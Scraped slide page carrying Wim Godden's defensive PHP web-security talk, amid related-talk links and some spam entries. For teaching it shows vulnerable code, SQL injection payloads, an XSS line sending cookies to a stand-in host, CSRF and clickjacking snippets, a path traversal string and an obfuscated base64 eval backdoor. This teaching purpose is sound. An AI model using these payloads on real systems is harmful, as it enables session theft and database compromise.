Charla EHU Noviembre 2014 - Desarrollo Web
Charla EHU Noviembre 2014 - Desarrollo WebCharla EHU Noviembre 2014 - Desarrollo Web
Charla EHU Noviembre 2014 - Desarrollo WebMikel Torres Ugarte
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using phpRishabh Srivastava
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 

Similaire à My app is secure... I think (20)

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
 
Rails and security
Rails and securityRails and security
Rails and security
 
Charla EHU Noviembre 2014 - Desarrollo Web
Charla EHU Noviembre 2014 - Desarrollo WebCharla EHU Noviembre 2014 - Desarrollo Web
Charla EHU Noviembre 2014 - Desarrollo Web
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 

Plus de Wim Godden

Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeWim Godden
 
Bringing bright ideas to life
Bringing bright ideas to lifeBringing bright ideas to life
Bringing bright ideas to lifeWim Godden
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8Wim Godden
 
The why and how of moving to php 7
The why and how of moving to php 7The why and how of moving to php 7
The why and how of moving to php 7Wim Godden
 
Building interactivity with websockets
Building interactivity with websocketsBuilding interactivity with websockets
Building interactivity with websocketsWim Godden
 
Bringing bright ideas to life
Bringing bright ideas to lifeBringing bright ideas to life
Bringing bright ideas to lifeWim Godden
 
Your app lives on the network - networking for web developers
Your app lives on the network - networking for web developersYour app lives on the network - networking for web developers
Your app lives on the network - networking for web developersWim Godden
 
The why and how of moving to php 7.x
The why and how of moving to php 7.xThe why and how of moving to php 7.x
The why and how of moving to php 7.xWim Godden
 
The why and how of moving to php 7.x
The why and how of moving to php 7.xThe why and how of moving to php 7.x
The why and how of moving to php 7.xWim Godden
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeWim Godden
 
Building interactivity with websockets
Building interactivity with websocketsBuilding interactivity with websockets
Building interactivity with websocketsWim Godden
 
Your app lives on the network - networking for web developers
Your app lives on the network - networking for web developersYour app lives on the network - networking for web developers
Your app lives on the network - networking for web developersWim Godden
 
The promise of asynchronous php
The promise of asynchronous phpThe promise of asynchronous php
The promise of asynchronous phpWim Godden
 
Practical git for developers
Practical git for developersPractical git for developers
Practical git for developersWim Godden
 
Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?Wim Godden
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeWim Godden
 
The promise of asynchronous php
The promise of asynchronous phpThe promise of asynchronous php
The promise of asynchronous phpWim Godden
 
When dynamic becomes static
When dynamic becomes staticWhen dynamic becomes static
When dynamic becomes staticWim Godden
 
The promise of asynchronous PHP
The promise of asynchronous PHPThe promise of asynchronous PHP
The promise of asynchronous PHPWim Godden
 

Plus de Wim Godden (19)

Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
Bringing bright ideas to life
Bringing bright ideas to lifeBringing bright ideas to life
Bringing bright ideas to life
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8
 
The why and how of moving to php 7
The why and how of moving to php 7The why and how of moving to php 7
The why and how of moving to php 7
 
Building interactivity with websockets
Building interactivity with websocketsBuilding interactivity with websockets
Building interactivity with websockets
 
Bringing bright ideas to life
Bringing bright ideas to lifeBringing bright ideas to life
Bringing bright ideas to life
 
Your app lives on the network - networking for web developers
Your app lives on the network - networking for web developersYour app lives on the network - networking for web developers
Your app lives on the network - networking for web developers
 
The why and how of moving to php 7.x
The why and how of moving to php 7.xThe why and how of moving to php 7.x
The why and how of moving to php 7.x
 
The why and how of moving to php 7.x
The why and how of moving to php 7.xThe why and how of moving to php 7.x
The why and how of moving to php 7.x
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
Building interactivity with websockets
Building interactivity with websocketsBuilding interactivity with websockets
Building interactivity with websockets
 
Your app lives on the network - networking for web developers
Your app lives on the network - networking for web developersYour app lives on the network - networking for web developers
Your app lives on the network - networking for web developers
 
The promise of asynchronous php
The promise of asynchronous phpThe promise of asynchronous php
The promise of asynchronous php
 
Practical git for developers
Practical git for developersPractical git for developers
Practical git for developers
 
Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?
 
Beyond php - it's not (just) about the code
Beyond php - it's not (just) about the codeBeyond php - it's not (just) about the code
Beyond php - it's not (just) about the code
 
The promise of asynchronous php
The promise of asynchronous phpThe promise of asynchronous php
The promise of asynchronous php
 
When dynamic becomes static
When dynamic becomes staticWhen dynamic becomes static
When dynamic becomes static
 
The promise of asynchronous PHP
The promise of asynchronous PHPThe promise of asynchronous PHP
The promise of asynchronous PHP
 

Dernier

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Dernier (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

My app is secure... I think

  • 1. Wim Godden Cu.be Solutions My app is secure... I think
  • 2. Who am I ? Wim Godden (@wimgtr) Founder of Cu.be Solutions (http://cu.be) Open Source developer since 1997 Developer of PHPCompatibility, OpenX, ... Speaker at PHP and Open Source conferences
  • 3. Who are you ? Developers ? System engineers ? Network engineers ? Ever had a hack ? Through the code ? Through the server ?
  • 4. This talk Based on 2-day training Lots of links at the end → slides online Code samples in PHP → no worries, works the same in other languages
  • 5. My app is secure... I think Basic stuff = known... … or is it ? Code is not enough Code Webserver Database server Operating system Network
  • 6. Disclaimer Do not use these techniques to hack Use the knowledge to prevent others from hacking you
  • 7. Reasons for hackers to hack Steal and sell your data Use your infrastructure as a jumpstation to hack other servers Send out lots of spam Use your server in a botnet for DDOS attacks Bring down your systems …
  • 8. OWASP Open Web Application Security Project www.owasp.org Top 10
  • 9. SQL Injection (OWASP #1) Over 15 years Still #1 problem
  • 10. Recognize this kind of code ? <? require("header.php"); $hostname="localhost"; $sqlusername="someuser"; $sqlpassword="somepass"; $dbName="somedb"; MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database."); @mysql_select_db("$dbName") or die("Unable to select database."); $fp=fopen("content/whatever.php","r"); while (!feof($fp)) $content.=fgets($fp,2); $res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']); for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++) { $lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n"; } $content=str_replace("<@textstring@>",$lst,$content); print $content; require("footer.php"); ?>
  • 11. SQL Injection (OWASP #1) Over 15 years Still #1 problem Easy to exploit Easy to automate (scan + exploit)
  • 12. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where email='wim@cu.be' E-mail : wim@cu.be
  • 13. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where email='' OR '1'='1' E-mail : ' OR '1'='1
  • 14. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user where '1'='1' E-mail : ' OR '1'='1
  • 15. Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } select * from user E-mail : ' OR '1'='1
  • 16. Hackers just want your data select * from user where email='' OR '1'='1' limit 2, 1; --'; select * from user where email='' OR '1'='1' limit 3, 1; --'; select * from user where email='' OR '1'='1' limit 4, 1; --'; ... ' OR '1'='1' limit 2, 1; –';E-mail :
  • 17. SQL Injection – much more... Much more than logging in as a user SQL injection possible → wide range of dangers
  • 18. Fixing SQL injection : attempt #1 Addslashes() ? $query = mysql_query('select * from user where id=' . addslashes($_GET['id'])); www.hack.me/id=5%20and%20sleep(10) select * from user where id=5 and sleep(10) What if we hit that code 100 times simultaneously ? MySQL max_connections reached → Server unavailable
  • 19. Fixing SQL injection : attempt #2 mysql_real_escape_string() mysqli_real_escape_string() pg_escape_string() ...
  • 20. Fixing SQL injection : use prepared statements $select = 'select * from user where email = :email'; $stmt = $db->prepare($select); $stmt->bindParam(':email', $_GET['email']); $stmt->execute(); $results = $stmt->fetchAll();
  • 21. ORM tools Doctrine, Propel, … When using their query language → OK Beware : you can still execute raw SQL !
  • 22. Other injections LDAP injection Command injection (system, exec, ...) Eval (waaaaaaaaaah !) … User input → Your application → External system If you provide the data, it's your responsibility ! If you consume the data, it's your responsibility !
  • 24. Session fixation angel.cloud.com 1Create evil PHP code 4 Session cookie on .cloud.com + redirect 2 3 devil.cloud.com devil.cloud.com 5 Login6 Use evil session cookie <html> … <a href=”http://devil.cloud.com”>Verify your account</a> … </html>
  • 26. Ways to avoid session fixation/hijacking session.use_trans_sid = 0 session.use_only_cookies = true session.cookie_httponly = true Change session on login using session_regenerate_id(true) Do not share sessions between sites/subdomains Do not accept sessions not generated by your code Foreign session → remove the session cookie from the user Regenerate session regularly using session_regenerate_id(true) Use HTTPS session.cookie_secure = true All of the above help against session fixation AND session hijacking !
  • 27. XSS – Cross Site Scripting <?php addMessage($_GET['id'], $_GET['message']); echo 'Thank you for submitting your message : ' . $_GET['message']; URL : /submitMessage http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
  • 28. XSS – more advanced http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your-cookie.js"></script>
  • 29. XSS – Advanced, yet simple <img src=x onerror=this.src='http://someplace.io/post-the-cookie-here.php? c='+document.cookie> http://www.our-app.com/?id=5&message=Thanks%2C+we+will+be+in+touch+soon.%3Cimg+src %3Dx+onerror%3Dthis.src%3D%27http%3A%2F%2Fsomeplace.io%2Fpost-the-cookie-here.php%3Fc%3D %27%2Bdocument.cookie%3E%0D%0A
  • 30. XSS : Non-persisted vs persistent Previous examples were non-persistent : issue occurs once Post code to exploitable bulletin board → Persistent → Can infect every user → If you stored it without filtering, you're responsible for escaping on output !
  • 31. XSS : how to avoid Filter input, escape output ! <?php echo 'I just submitted this message : ' . htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
  • 32. CSRF : Cross Site Request Forgery www.our-app.com 1 Submit article for review 2 Retrieve article for review 3 Evil html or jsmakes call 4 Devil uses extra privileges Here's the article you were asking for. <img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
  • 33. CSRF : ways to avoid Escape the output (where did we hear that before ?) Add a field to forms with a random hash/token for verification upon submit Check the referer header → Easy to fake <form method="post" action="userSave.php"> <input name="id" type="hidden" value="5" /> <input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" /> rest of the form </form>
  • 34. General rules – input validation Assume all data you receive as input contains a hack attempt ! That includes data from trusted users → over 90% of hacks are done by employees/partners/... Filter on disallowed characters Check validity of Dates Email addresses URLs etc. Input validation is not browser-side code, it's server-side code (you can ofcourse use browser-side code to make it look good)
  • 35. General rules – validation or filtering ? Validation : Verify if the values fit a defined format Examples : expecting int, but received 7.8 → “error, 7.8 is not a valid integer” expecting international phone number, but received “+32 3 844 71 89” Filtering / sanitizing : Enforce the defined format by converting to it Examples : expecting int, but received 7.8 → 8 expecting int, but received 'one' → 0 expecting international phone number, but received “+32 3 844 71 89” → “+3238447189” Both have (dis)advantages
  • 36. General rules – escaping output Doing input validation → why do you need output escaping ? What if the data originates from a webservice an XML feed … Always escape output !
  • 37. Clickjacking Do you want to support our cause ? NoSure Do you want to delete all your Facebook friends ? Yes No FB button <style> iframe { /* iframe from facebook.com */ width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=0); opacity:0; } </style>
  • 38. Clickjacking - solutions Sending frame-ancestor directive : Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Content-Security-Policy: frame-ancestors example.com wikipedia.org Jump out of iframe (use Framekiller)
  • 39. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php redirect to main
  • 40. Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php (doesn't check cookie !) redirect to main
  • 41. Bad authentication / authorization layer Only hiding URLs on view, not restricting on action /somewhere is visible on screen /somewhere/admin is not visible, but is accessible Allowing direct access to other user's data /user/profile/id/311 is the user's profile /user/profile/id/312 is also accessible and updateable Allowing direct access to file downloads with guessable urls /download/file/83291.pdf Creating cookies : loggedin=1 userid=312 admin=1
  • 42. Protecting your web stack Application language Webserver Database server Mail server Other servers Firewalls ...
  • 43. Protecting your web stack - PHP Update to the latest version (7.1 = EOL) Safe_mode = dead → use PHP-FPM or VMs Register_globals = dead :-) Suhosin patch → mostly for web hosting companies Disable 'dangerous' PHP functions you don't need in php.ini system exec passthru 'Eval' is not a function, so can not be disabled
  • 44. Protecting your web stack – PHP code If you allow uploads, restrict extensions. No .php, .phtml ! Don't show errors...
  • 45. Protecting your web stack – PHP code If you allow uploads, restrict extensions. No .php, .phtml ! Don't show errors... ...and don't show exceptions, but... …log them ! And watch your logs ;-) If you use filenames as parameters download.php?filename=test.pdf Make sure you don't allow ../../../../etc/passwd Use basename() and pathinfo() to restrict File extensions : Use .php Don't use .inc, .conf, .include, ...
  • 46. Protecting your web stack – Passwords Don't use MD5 or SHA1 → sha512, blowfish, … Set a good password policy Min 8 chars, min 1 number, min 1 uppercase char, … NO maximum length Try to avoid password hints → Email link is better for recovery Don't create your own password hashing algorithm ! Use password_hash() 5.5+ : built-in < 5.5 : ircmaxell/password-compat
  • 47. Protecting your web stack – Webserver Block direct access to upload directories
  • 48. Access to private files, uploads, ...
  • 49. Protecting your web stack – Webserver Block direct access to upload directories Allow only access to port 80 and 443 (!) Disable phpMyAdmin (VPN only if required) On Apache don't : AllowOverride All Options Indexes Avoid using .htaccess Block access to .svn and .git Block access to composer.lock, composer.json, … (which should be outside your webroot normally)
  • 50. Protecting your web stack – Webserver
  • 53. Protecting your web stack – Database server No access from the web required Give it a private IP Other websites on network ? → send traffic over SSL
  • 54. Protecting your web stack Use public/private key pairs for SSH, not passwords Don't login as root → Use sudo for commands that really need it Allow SSH access only from VPN Running Memcached ? Gearman ? … ? → Block external access
  • 60. Lack of updates Not updating system packages Not updating frameworks and libraries Not just main components Doctrine Bootstrap Javascript libraries etc. Not updating webserver software Not updating database server software Recently : Heartbleed (OpenSSL) Shellshock (Bash) Ghost (Glibc)
  • 61. Protecting your web stack - firewalls Separate or on-server Default policy = deny all Don't forget IPv6 !!!
  • 62. Protect your backups Should be encrypted with public/private key system Private key should be stored in 2 separate locations Backups should never be stored on same server Backup server should pull backups
  • 63. MySQL : use the binlog Setup Master-Slave (even if you don’t have a Slave !) Master creates binlog Allows recovery to a specific second Backup the binlogs for 7-10 days MySQL backup : mysqldump with --opt --single-transaction (preferably on slave to avoid locking users)
  • 64. First action of a hacker Make sure they don't lose the access they gained Create new user → easy to detect Install a custom backdoor → easy to detect with good IDS Install a backdoor based on installed software → Example : start SSHD with different config on different port (remember firewall ?) → Harder to detect → Kill it... what happens ? → Probably restarts via cronjob
  • 65. Using an Intrusion Detection System Host-based Intrusion Detection System (HIDS) OSSEC Samhain Network-based Intrusion Detection System (NIDS) Snort Sirucata
  • 66. One IDS distro to rule them all Security Onion Based on Ubuntu Contains all the IDS tools... ...and much more
  • 67. What's the problem with public wifi ? Traffic can be intercepted Traffic hijacking / injection Forcing site to use HTTPS fixes it right ? What if user goes to some other HTTP site and I inject <img src=”http://yoursite.com/someurl”> ? → Session cookies are transmitted over HTTP Use HSTS HTTP Strict Transport Security Tells browser to use only HTTPS connections Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [; preload] Chrome 4+, FF 4+, IE 11+, Opera 12+, Safari 7+
  • 68. You've been hacked ! Now what ? (1/4) Take your application offline → Put up a maintenance page (on a different server) Take the server off the public Internet Change your SSH keys Make a full backup Check for cronjobs Check access/error/... logs (And give them to legal department) Were any commits made from the server ? → Your server shouldn't be able to !
  • 69. What a hack might look like eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0 xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW 5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW 9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
  • 70. What a hack might look like
